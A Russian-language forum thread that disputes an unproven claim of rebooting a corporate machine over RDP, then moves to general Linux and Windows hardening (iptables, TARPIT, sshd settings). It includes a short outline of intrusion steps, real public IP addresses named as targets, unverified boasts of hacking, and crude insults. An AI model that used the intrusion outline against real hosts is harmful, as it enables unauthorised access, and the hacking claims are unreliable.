Не передёргивай. Он не говорил, что сломал. Он сказал, что RDP "дырявый" и через него он отправлял в reboot машину с адресом 194.190.10.214. Как верно сказал blow05, ни доказать это, ни опровергнуть невозможно.

Skynet2015 написал:
4. Ему попросили привести доказательства, но вместо этого он начал говорить о мифической машинке с определенным набором сервисов

Да он о ней с самого начала говорил.

Skynet2015 написал:
5. Решив поддержать этот долбоебизм я начал подыгрывать (ибо виртуальная машина была такая, ей был выдан реальный белый ИП, но с совершенно с другим набором ПО и под виндой). Пример:

Ну, и нахр№на ты поддерживал "долбоебизм"? И кого ты теперь винишь, что тебе не верят нормальные люди, а верят только вендоклоуны, вроде МОРЗЕ?

Skynet2015 написал:
6. Он не унимался и говорил, что он ломанул меня по RDP, хотя у нас оно вообще не используется.

Ещё раз: он не ломал тебя по RDP. И не говорил о том, что ломал. Когда ему предложили сломать, он отказался. Он сказал, что есть дырка в RDP, через которую он reboot'ил машину. Всё.

Skynet2015 написал:
Ну и пошло-поехало. Что еще?

Да то, что, как я и сказал выше, тебе вообще не следовало ничего доказывать. Он "ломает", — он пусть и доказывает. А так получилось дурное шоу для клоунов с интеллектом МОРЗЕ.

Apollo 11 написал:
Так IP 194.190.10.214 был или нет?

Был, спешл фор хим

Apollo 11 написал:
Не передёргивай. Он не говорил, что сломал.

Да лана? А что там он говорил про то что ноги рздвигала, и про то что скриптом на питоне ломал, это как понять - меня одного заглючило, да? И что он аж 20 раз так делал, наверное он не говорил. Ну давай ты тоже не будешь передергивать факты. Я сказал как было дело, Тупо сниффил потом на открытый на небольшое время портпытался вызвать переполнение буффера. Как то так.

ikkunan salvataja написал:
То есть если на машине какой сервис крутится то она по любому пингуется?
Ну тогда пингуем 188.134.14.111 , а потом забираем с ftp://188.134.14.111/pub/slor.png файл.

Давай по другому:

blow05 написал:
UPS, А я и не защищаю ректора. Но в постах скайнета мне встретились противоречия, которые аполло выше процитировал. В словах ректора таких явных противоречий не было. Да, он привел конкретные вещи, но не подтвердил их. Хотя как он мог подтвердить их - я не знаю (завести у себя в локалке виртуалку с правильным ip и произвести над ней какие-то действия - не сложно, и таким логам лично я бы не поверил). Поэтому я и говорю, что факт перезагрузки не доказан и не опровергнут.

Я вообще то всегда к вам прислушиваюсь.Немного отвлечемся и закончим на этом.
" Встречаются на форуме двое, и
-ты м#дак
-сам м#дак
я тебя сейчас поломаю,у тебя дырявая винда
-ломай
В итоге человек сходу нашел как,через что и тут же без подготовки поломал корпоративку( не думаю,что д.билы там) и чуть не хакнул комп директора. При этом никаких доказательст нет, но есть бравада этим.
У меня лично крайне негативное отношение к такого рода развлекающимся взломщикам. Как то так. Доброго всем времени суток.

Skynet2015 написал:
5. Решив поддержать этот долбоебизм я начал подыгрывать (ибо виртуальная машина была такая, ей был выдан реальный белый ИП, но с совершенно с другим набором ПО и под виндой). Пример:

А скриншот с линуксом от чего был тогда?

blow05 написал:
А скриншот с линуксом от чего был тогда?

Блять, корпоративного сервака йопта, у нас не один сервак, если чо.

UPS, Все так, только один бравировал недоказанными действиями (которые при этом в принципе ни доказать ни опровергнуть невозможно), а второй сам себе противоречит. Да еще оказывается и совершенно не знает мат.часть. Я тебя тоже уважаю

Skynet2015 написал:
Тупо сниффил

Расскажи плз, как можно сниффить удаленную сеть?

Skynet2015 написал:
Давай по другому:

Мой тебе совет. Почитай немного литературы по сетям и IP протоколу, а потом начинай спорить на эти темы. А приведенный тобой трейс говорит только о том, что у тебя корбина, а у компании-партнеров - wiland

Skynet2015 написал:
Блять, корпоративного сервака йопта, у нас не один сервак, если чо.

Ну и зачем ты тогда говорил, что ректор линуховый сервак ломал?

Skynet2015 написал:
А теперь ВНИМАНИЕ, самый главный баттх№рт, на чем РЕАЛЬНО крутилась виртуалка, которую он хотел сломать:

Или ты имел ввиду, что это хостовая система?

blow05 -



вот хотел вас спросить про безопасность( это с рабочей машинки снял сегодня и это только первая линия), в принципе палится только агент и раскладка клавы,порты недоступны например. Каким образом ломают типа Rector? Нет действительно не понимаю как у него получается.
http://whoer.net/extended здесь на скрипты проверяюсь обычно( много интересного)

blow05 написал:
Расскажи плз, как можно сниффить удаленную сеть?

Он сниффил не сеть а конкретный комп, не?

blow05 написал:
приведенный тобой трейс говорит только о том, что у тебя корбина, а у компании-партнеров - wiland

Да? Странно, приведенный трейс говорит что путь до 2-х ип адресов нормально прослеживается, а вот до 194.190.10.214 нет, а?

Skynet2015 написал:
Он сниффил не сеть а конкретный комп, не?

OMG... Тогда расскажи плз как можно "просниффить удаленный комп". Мне кажется, что ты абсолютно не понимаешь, о чем говоришь.

Skynet2015 написал:
Да? Странно, приведенный трейс говорит что путь до 2-х ип адресов нормально прослеживается, а вот до 194.190.10.214 нет, а?

И что? Тебе вон уже привели пример хоста, который не пингуется, но с него можно по ftp файл стянуть. Раз ты не понимаешь намеков - скажу прямо. Пинги можно запретить, без ущерба для всего остального функционала

UPS, Начинается все с простого сканера портов (скайнет, а ты слушай)

<br />PORT    STATE  SERVICE      VERSION<br />22/tcp  open   ssh          OpenSSH 5.8 (protocol 2.0)<br />80/tcp  closed http<br />88/tcp  closed kerberos-sec<br />443/tcp closed https<br />

Ну а потом - по ситуации. Смотрим, уязвим ли openssh данной версии, если да и есть эксплоит - пробуем применить. Если нет - ищем менее защищенные хосты в той же подсети, если получается - проходим вовнутрь и там уже возможны варианты. Ну и социальную инженерию никто не отменял.

UPS написал:
вот хотел вас спросить про безопасность( это с рабочей машинки снял сегодня и это только первая линия), в принципе палится только агент и раскладка клавы,порты недоступны например.

Это не с рабочей машинки, рабочая машинка за NAT'ом. А что касается портов роутера, так на нём SSH зачем то открыт.

blow05 написал:
Смотрим, уязвим ли openssh данной версии, если да и есть эксплоит - пробуем применить. Если нет - ищем менее защищенные хосты в той же подсети, если получается - проходим вовнутрь и там уже возможны варианты. Ну и социальную инженерию никто не отменял.

Мне кажется в нормальной организации, вероятнее всего последнее. Очень много переменных, хотя конторку из 3х теть Зин, не представляет труда.
В свете топика как вы считаете, что более уязвимо: винда с обновами и спец.ПО или Linux , который как правило кроме обнов никакого доп.ПО не имеет?

ikkunan salvataja написал:
так на нём SSH зачем то открыт

Спасибо ,будем устранять,я уже увидел.

Skynet, у меня дочка приболела, поэтому я сюда заглядываю на минуту-другую и у меня нет ни времени, ни желания вникать в тонкости ситуации. Скажу только, что ты в своём троллинге Rector'а совершил ошибку: тебе нужно было дать реальный IP реальной машины с реальной Виндой (пусть даже десктоп и пусть даже в виртуалке) и не менять условия эксперимента по ходу. А потом требовать подтверждения взлома. Скажем, скинуть kenzzzooo как нейтральной стороне какой-нибудь текстовый файл, разместить этот файл в одном из каталогов (пусть будет в каталоге юзера) и потребовать от Rector'a, чтобы предоставил этот файл. А потом сверить с тем файлом, что ты отдал kenzzzooo. Предоставит, — честь и хвала крутому хацкеру. Не предоставит, — позор болтунам и хвастунам.
Сейчас же я могу только повторить: я не считаю Windows такой уж уязвимой системой (при условии, конечно, что она получает все обновления), равно как не считаю Linux пуленепробиваемым. И, наконец, не считаю, что Rector доказал факт воздействия на атакуемую машину, равно как и ты не доказал факт отсутствия такого воздействия (особенно, если учесть, что ты сам признал, что попытки были). Так что обе ваши позиции равнобездоказательны. В следующий раз, если решишь троллить Rector'а, сам не ведись на троллинг, а обставь всё дело таким образом, чтобы сомнений ни у кого не возникало.
Всем спокойной ночи! Надеюсь, и у меня ночь будет спокойная.

UPS написал:
Мне кажется в нормальной организации, вероятнее всего последнее. Очень много переменных, хотя конторку из 3х теть Зин, не представляет труда.

Не забываем про 0day уязвимости, про эксплоиты, которых нет в паблике... Да, это удовольствие не их дешевых, но от взлома реально не застр№хован никто. Просто везде разная цена вопроса.

UPS написал:
В свете топика как вы считаете, что более уязвимо: винда с обновами и спец.ПО или Linux , который как правило кроме обнов никакого доп.ПО не имеет?

Что значит Linux не имеет спец ПО? iptables по гибкости и возможностям рвет многие виндовые фаерволы (я не особо силен в энтерпрайз решениях, может там и есть решения как минимум не хуже, но iptables при этом абсолютно бесплатен). Также не забываем про SELinux и AppArmor - подобных решений для windows я не знаю. Ну и запуск служб от непривилегированных пользователей (для каждой - свой) при отсутсвии рабочего эксплоита для повышения привилегий - сводят возможность дефейса к минимуму. Про windows мне сложно говорить. Но при грамотной настройке в плане безопасности я думаю можно поставить знак равенства.

Apollo 11, передавай дочке, чтобы выздоравливала поскорее!

UPS написал:
в принципе палится только агент и раскладка клавы

Это не раскладка, а страна, в которой находится хост. Определяется через общедоступные сервисы.

UPS написал:
Каким образом ломают типа Rector?

Некоторые считают, что не ломают никак.
По открытым портам, по стандартным (и не очень) сетевым запросам. По ответным действиям, короче говоря. При наличии эксплойтов, чаще всего. Вот отвечает машинка по RDP; стало быть, проверим, проходит ли атака на уязвимость, которую нашли в Марте. Не прошла? Опять чешем репу...
Как можно увидеть черную дыру? По излучению, которое некоторое время испускает поглощаемая ею звезда.

UPS написал:
В свете топика как вы считаете, что более уязвимо: винда с обновами и спец.ПО или Linux , который как правило кроме обнов никакого доп.ПО не имеет?

То, что вы лучше всего знаете и умеете защищать. Если Вы дадите Линукс-пионэру доступ в Интернет, и он наставит себе всевозможных сервисов, полагая, что у него крутая ось, а ломают только ламеров-виндузятников, то через эти сервисы его в один ясный день и проломят. С другой, если Вы дадите полностью защищенную Windows подростку, которому сил нет как хочется чего-нибудь расшарить, скачать, крякнуть, обойти запрет, когда "одмин забанел контакт, помогите", кончится это примерно тем же: он отключит UAC и файрвол, включит гостя, пойдет через анонимный прокси, нажмет "Да" 15 раз и вперед, к светлому будущему по админской учеткой.

blow05 cпасибо за ответ, но вот еще наблюдал какую картину: так как линукс стремится в массы (и будем считать это плохой рекламой) одним из его преимуществ заявляется как правило иммунитет к вирусам и безопасность из коробки( про повышении привелегий дежим в уме ) то большинство пользователей не заморачиваются даже фаерволом( Я тоже не заморачивался ) . Это человеческий фактор-в винде сразу за халатность накажут, а в линух вроде безопасно.... К стати это у меня на лине порт 22 открыт(заходите гости) -понадеялся на линух Поэтому некоторые могут поплатиться и в лине, хотя если в лине настроить фаервол методом закрытия Всех портов и потом открывать их по необходимости то будет Естественно лучше без самбы.

Павел написал:
Это не раскладка, а страна, в которой находится хост. Определяется через общедоступные сервисы.

Да я не много не о том. Криво скрины залились немного. Дело в том,что при нормальной безопасности отключены даже скрипты, если убрать ru-ru
то и страну определить очень проблематично. Далее можно выйти до ближайшего прова...... В принципе вы конечно правы ,что безасного нет ничего, но как правило это требует-цель,cредства,время и нахрапом , как нам пытались показать ничего не сделать против серьезной организациии в которой работает допустим Skynet2015 .

Павел написал:
То, что вы лучше всего знаете и умеете защищать. Если Вы дадите Линукс-пионэру доступ в Интернет, и он наставит себе всевозможных сервисов, полагая, что у него крутая ось, а ломают только ламеров-виндузятников, то через эти сервисы его в один ясный день и проломят. С другой, если Вы дадите полностью защищенную Windows подростку, которому сил нет как хочется чего-нибудь расшарить, скачать, крякнуть, обойти запрет, когда "одмин забанел контакт, помогите", кончится это примерно тем же: он отключит UAC и файрвол, включит гостя, пойдет через анонимный прокси, нажмет "Да" 15 раз и вперед, к светлому будущему по админской учеткой.

Согласен на 100%, на практике оно так и получается.

UPS написал:
К стати это у меня на лине порт 22 открыт(заходите гости) -понадеялся на линух

Ну и что? Могу открыть на своей машине SSH да ещё пароль рута дать. Как правило этого будет мало. А SSH иногда требуется на внешку открыть, хотя бы для того, чтобы дать удалённому клиенту поработать через freenx.

ikkunan salvataja написал:
Ну и что? Могу открыть на своей машине SSH да ещё пароль рута дать. Как правило этого будет мало.

мало для чего?

ikkunan salvataja написал:
Ну и что? Могу открыть на своей машине SSH да ещё пароль рута дать. Как правило этого будет мало.

Нравится ваша реакция, как только заикнулся за линух, так сразу защищать Пароль не нужен, я не хакир.

usual_user написал:
мало для чего?

Для доступа к моей машине.

PermitRootLogin no?

usual_user написал:
PermitRootLogin no?

Угу, причём это умолчательное поведение. А пароль привилегированного пользователя я давать не обещал.

ikkunan salvataja написал:

PermitRootLogin no?

Цитата:
PermitRootLogin no всё равно пускает рута

# grep Root /etc/ssh/sshd_config
PermitRootLogin no

# service ssh restart

# ss -l4 | grep ssh
0 128 *:ssh *:*
0 128 :::ssh :::*

# cat /etc/debian_version
5.0.4
Всё равно пускает root'а? В чём проблема?

http://www.linux.org.ru/forum/admin/4837481 если и дальше сильно заморачиватся,то можно и в кащенко поехать.

UPS, а он его не долго пускал. До первого ребута.

usual_user написал:
UPS, biggrin а он его не долго пускал. До первого ребута.

Да я читал уже про это(давно уже) Возвращаемся к вечной теме щит и меч. Я под линукс не пользуюсь, не нужно оно мне

А я иногда пользуюсь. Мот кто подскажет как в mc подключится по ssh на нестандартном порту?

usual_user написал:
А я иногда пользуюсь. Мот кто подскажет как в mc подключится по ssh на нестандартном порту?

Может быть это поможет,вроде хорошо написано.http://www.bormotuhi.net/showthread.php?t=13354

UPS написал:
Может быть это поможет,вроде хорошо написано.http://www.bormotuhi.net/showthread.php?t=13354

пост 11-12 обратите внимание

username@server.com:port

зараза, завтра попробую. Спасибо.UPS,

UPS, т.к. на данный момент в открытом доступе эксплоитов и открытых уязвимостей для ssh нет - можно считать, что фаер не обязателен. По другим сервисам - кроме самбы из популярного тоже вроде ничего. Поэтому проблем нет. Фаервол - так, на всякий случай. Открытый 22 порт (ну при запрещенном логине от рута и несловарных паролях у пользователей) - никаких дыр сам по себе не дает. А фаервол можно настроить не только тупым закрытием портов :) Я например, когда есть настроение, настраиваю так, чтобы разрешить определенное количество новых соединений для одного ip в час (3-5), кроме сервисов типа апача и фтп, на все порты. Т.е. обычный сканер уже идет лесом и задача кулхацкерам усложняется в разы, т.к. он практически сразу начинает ломать сам себя (слава TARPIT!).

blow05 написал:
А фаервол можно настроить не только тупым закрытием портов :)

это действенное и эффективное решение для начинающих

blow05 написал:
Я например, когда есть настроение, настраиваю так, чтобы разрешить определенное количество новых соединений для одного ip в час (3-5), кроме сервисов типа апача и фтп, на все порты. Т.е. обычный сканер уже идет лесом и задача кулхацкерам усложняется в разы, т.к. он практически сразу начинает ломать сам себя (слава TARPIT!).

Это же гораздо более элегантно

blow05 написал:
т.к. на данный момент в открытом доступе эксплоитов и открытых уязвимостей для ssh нет - можно считать, что фаер не обязателен.

Это зависит от.
Я бы советовал всем при любых вариантах файрвол поднимать.
Если у человека какой-то пакет потянул какой-то сервис, то хорошо, если это, например, mySQL, который по умолчанию слушает только на внутреннем (петлевом) интерфейсе. А вдруг smbd? Или человек просто каталог с фильмами в домашней локалке шарит? Не все правят свои конфиги. Это первое.
Второе. Если сервис должен смотреть наружу, то все равно его лучше тем же TARPIT'ом подстр№ховать. Я видел, как ломали один недонастроенный Asterisk (IP-телефония). Он, бедный, пытался каждый логин отработать. Висело кругом всё, включая ssh. Забанили адрес в iptables - отпустило. Ему ж пакет дропнуть - копейки. Атака шла еще дня четыре, с одного и того же адреса.
Третье. Если за линуксом домашняя сетка, и в ней Windows, а в нем троян, может помочь фильтр исходящих соединений, настроенный на файрволе.

blow05 написал:
слава TARPIT!

+1
Но тут нужна осторожность: в некоторых системах для него надо ставить патч к ядру, который слетает при апгрейде того самого ядра. После чего iptables перестает понимать эту цель, и ни одно правило не применяется (если через iptables-restore). Тоже о пользе настройки конфигов.

Apollo 11, Павел, blow05, ikkunan salvataja, спасибо за поддержку! Создал тему на форуме о RDP здесь.

Павел, тут дело еще в том, что iptables нужно уметь правильно настроить. А для этого нужно неплохо знать мат.часть. Хотя в принципе достаточно дропать все входящее, исходящее и forward со state new, кроме определённых портов. От большинства атак это защитит.

Но для меня необходимый минимум - защита от сканирования портов и попытка создать новое подключение с неправильными TCP флагами. Остальное - зависит от задачи. Ну и те сервисы, которые не должны смотреть наружу все-таки предпочитаю перенастраивать, т.к. находятся товарищи, которые в случае проблем с сетью первым делом тушат фаер (вместо того, чтобы посмотреть логи, ага - все, что не ACCEPT - логируется), а потом не всегда забывают его включить. И опять таки - не забываем о потенциально возможных уязвимостях в том же iptables (полагаться исключительно на 1 инструмент для обеспечения безопасности мне моя паранойя не позволяет)

blow05 написал:
т.к. находятся товарищи, которые в случае проблем с сетью первым делом тушат фаер (вместо того, чтобы посмотреть логи, ага - все, что не ACCEPT - логируется), а потом не всегда забывают его включить.

Не удержался- есть такие которые не знают как их посмотреть и прочитать и начинают бешенно вращать глазами при этом
А вы им о таких сложностях (юмор взятый из опыта общения с представителем прова)

ikkunan salvataja написал:
Ну и что?

Заебут ломиться. Причём ломятся именно по 22-му порту Какиры, хуле.

selenscy написал:
Причём ломятся именно по 22-му порту

Дык и я о том же, он первый и попался ( правда уже все обсудили вроде)

UPS написал:
Дык и я о том же, он первый и попался ( правда уже все обсудили вроде)

Банальная смена порта от таких какиров конечно помогает, по крайней мере логи чистые но лично я, в отличие от Акунов ко всяким сервисам к удалённой машинке предпочитаю соединяться другими способами, благо их очень много.

Без обид к красноглазым но Samba у меня работала в 3-х случаях из 10-ти без глюков и косяков(и Lin-гуру не смогли помочь и я как понял там карта ляжет),так что делаем выводы-если для особо северных и одаренных не дойдет можно провести онлайн установку мне на super-Lin через Team Viewer т.е. установку Samba (Lin будет бубунтой).Ну что крутые Lin-гуру есть?

supermambet написал:
Без обид к красноглазым но Samba у меня работала в 3-х случаях из 10-ти без глюков и косяков(и Lin-гуру не смогли помочь и я как понял там карта ляжет),так что делаем выводы-если для особо северных и одаренных не дойдет можно провести онлайн установку мне на super-Lin через Team Viewer т.е. установку Samba (Lin будет бубунтой).Ну что крутые Lin-гуру есть?

,

Да установиться то она установится Ты наверное хотел сказать "заставить работать" как тебе надо

selenscy написал:
Ты наверное хотел сказать "заставить работать" как тебе надо

в точку.

selenscy

selenscy,просто в Linux есть много того что устанавливается но не работает.